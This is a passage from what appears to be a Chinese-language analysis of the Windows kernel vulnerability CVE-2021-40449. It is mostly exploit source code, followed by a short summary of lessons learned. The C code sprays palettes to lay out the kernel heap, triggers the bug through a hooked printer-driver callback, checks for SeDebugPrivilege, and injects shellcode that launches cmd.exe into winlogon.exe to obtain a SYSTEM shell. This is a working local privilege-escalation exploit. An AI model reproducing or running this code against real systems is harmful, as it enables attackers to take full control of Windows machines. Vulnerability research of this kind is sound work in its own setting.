	DWORD palCount = (size - 0x90) / 4;
	DWORD palSize = sizeof(LOGPALETTE) + (palCount - 1) * sizeof(PALETTEENTRY);
	LOGPALETTE* lPalette = (LOGPALETTE*)GlobalAlloc(GMEM_ZEROINIT, palSize);

	if (lPalette == NULL) {
		printf("[Error_%d] SprayPalettes(): Insufficient system resource.\n", __LINE__);
		return;
	}
	
	// lPalette->PaletteEntry
	PCHAR Fake = (PCHAR)lPalette+4;

	// Fake BitmapHeader
	ULONG64 BitmapHeader = FakeBitmapHeader() - 1 + 0x10;
	printf("[+] FakeBitmapHeader = %p\n", BitmapHeader);

	/*
		1607:
		*(pdc+0x720) = BitmapHeader
		*(pdc+0xAD0) = RtlSetAllBits
	*/
	((PULONG64)Fake)[0xD7] = BitmapHeader;
	((PULONG64)Fake)[0x14D] = g::RtlSetAllBitsAddress;

	lPalette->palNumEntries = (WORD)palCount;
	lPalette->palVersion = 0x300;

	for(int i=0;i<0x1000;i++)
		CreatePalette(lPalette);
}

bool CheckPrivilege(HANDLE TokenHandle)
{
	BOOL isPrivilegeSet = FALSE;
	PRIVILEGE_SET		privSet;
	LUID_AND_ATTRIBUTES Privileges[1];
	LookupPrivilegeValue(NULL, "SeDebugPrivilege", &(Privileges[0].Luid));
	Privileges[0].Attributes = 0;

	privSet.PrivilegeCount = 1;
	privSet.Control = PRIVILEGE_SET_ALL_NECESSARY;
	memcpy(privSet.Privilege, Privileges, sizeof(Privileges));

	PrivilegeCheck(TokenHandle, &privSet, &isPrivilegeSet);
	return isPrivilegeSet;
}

DWORD getProcessId(const char* name)
{
	DWORD aProcesses[1024], cbNeeded, cProcesses;
	unsigned int i;

	if (!EnumProcesses(aProcesses, sizeof(aProcesses), &cbNeeded))
	{
		printf("[Error_%d] EnumProcess failed...\n",__LINE__);
		exit(0);
	}


	// Calculate how many process identifiers were returned.
	cProcesses = cbNeeded / sizeof(DWORD);

	// Print the name and process identifier for each process.
	for (i = 0; i < cProcesses; i++)
	{
		if (aProcesses[i] != 0)
		{
			DWORD processID = aProcesses[i];
			CHAR szProcessName[MAX_PATH] = "<unknown>";

			// Get a handle to the process.

			HANDLE hProcess = OpenProcess(PROCESS_QUERY_INFORMATION |
				PROCESS_VM_READ,
				FALSE, processID);

			// Get the process name.

			if (NULL != hProcess)
			{
				HMODULE hMod;
				DWORD cbNeeded;

				if (EnumProcessModules(hProcess, &hMod, sizeof(hMod),
					&cbNeeded))
				{
					GetModuleBaseNameA(hProcess, hMod, szProcessName,
						sizeof(szProcessName) / sizeof(TCHAR));
				}
			}

			// Print the process name and identifier.
			if (!lstrcmpA(szProcessName, name))
			{
				CloseHandle(hProcess);
				return (processID);
			}

			// Release the handle to the process.

			CloseHandle(hProcess);
		}
	}

	return 0;

}

void SpawnShell() {
	HANDLE hSystemProcess = INVALID_HANDLE_VALUE;
	PVOID  pLibRemote;
	HMODULE hKernel32 = GetModuleHandleA("Kernel32");
	DWORD processID;
	unsigned char shellcode[] =
		"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41\x50\x52\x51" \
		"\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48\x8b\x52\x18\x48\x8b\x52" \
		"\x20\x48\x8b\x72\x50\x48\x0f\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0" \
		"\xac\x3c\x61\x7c\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed" \
		"\x52\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b\x80\x88" \
		"\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0\x50\x8b\x48\x18\x44" \
		"\x8b\x40\x20\x49\x01\xd0\xe3\x56\x48\xff\xc9\x41\x8b\x34\x88\x48" \
		"\x01\xd6\x4d\x31\xc9\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1" \
		"\x38\xe0\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58\x44" \
		"\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44\x8b\x40\x1c\x49" \
		"\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0\x41\x58\x41\x58\x5e\x59\x5a" \
		"\x41\x58\x41\x59\x41\x5a\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41" \
		"\x59\x5a\x48\x8b\x12\xe9\x57\xff\xff\xff\x5d\x48\xba\x01\x00\x00" \
		"\x00\x00\x00\x00\x00\x48\x8d\x8d\x01\x01\x00\x00\x41\xba\x31\x8b" \
		"\x6f\x87\xff\xd5\xbb\xe0\x1d\x2a\x0a\x41\xba\xa6\x95\xbd\x9d\xff" \
		"\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a\x80\xfb\xe0\x75\x05\xbb\x47" \
		"\x13\x72\x6f\x6a\x00\x59\x41\x89\xda\xff\xd5\x63\x6d\x64\x2e\x65" \
		"\x78\x65\x00";


	if ((processID = getProcessId("winlogon.exe")) == 0)
	{
		printf("[Error_%d] Couldn't retrieve process ID...\n", __LINE__);
		return;
	}
	printf("[+] Retrieved process id: %d\n", processID);
	hSystemProcess = OpenProcess(GENERIC_ALL, false, processID);

	if (hSystemProcess == INVALID_HANDLE_VALUE || hSystemProcess == (HANDLE)0)
	{
		printf("[Error_%d] Couldn't open system process...\n", __LINE__);
		return;
	}
	printf("[+] Got a handle on a system Process: %08p\n", hSystemProcess);


	pLibRemote = VirtualAllocEx(hSystemProcess, NULL, sizeof(shellcode) * 2, MEM_COMMIT, PAGE_EXECUTE_READWRITE);

	if (!pLibRemote)
	{
		printf("[Error_%d] Virtual alloc failed !\n", __LINE__);
		return;
	}

	printf("[+] Allocation in system process succeded with address %08p\n", pLibRemote);

	if (!WriteProcessMemory(hSystemProcess, pLibRemote, shellcode, sizeof(shellcode), NULL))
	{
		printf("[Error_%d] WriteProcessMemory failed !\n", __LINE__);
		return;
	}

	HANDLE hThread = CreateRemoteThread(hSystemProcess, NULL, 0, (LPTHREAD_START_ROUTINE)pLibRemote, NULL, 0, NULL);

	printf("[+] Writing in system process succeded\n");

	if (hThread == NULL) {
		printf("[Error_%d] CreateRemoteThread failed !\n", __LINE__);
		return;
	}
	else
		printf("[+] Remote thread created !\n");
	CloseHandle(hSystemProcess);
}

int main() {
	if (Init()) {
		Hook_DrvEnablePDEV();
		g::hdc = CreateDCA(NULL, g::szPrinterName, NULL, NULL);
		if (g::hdc == 0) {
			printf("[Error_%d] CreateDCA failed !\n", __LINE__);
			exit(-1);
		}
		g::bIsTrigger = TRUE;
		ResetDCA(g::hdc, NULL);
		if (CheckPrivilege(g::hToken)) {
			SpawnShell();
		}
		else {
			printf("[Error_%d] Permission promotion failed!\n", __LINE__);
		}
	}
	system("pause");
	return 0;
}

4.2.效果

在这里插入图片描述

5.总结

从对 CVE-2021-40449的分析中，我学会了

win10下利用 $ZwQuerySystemInformation\textcolor{cornflowerblue}{ZwQuerySystemInformation}$ 和 $NtSetInformationThread\textcolor{cornflowerblue}{NtSetInformationThread}$ 绕过 SMAP的方法
利用调色板进行任意内存大小的堆布局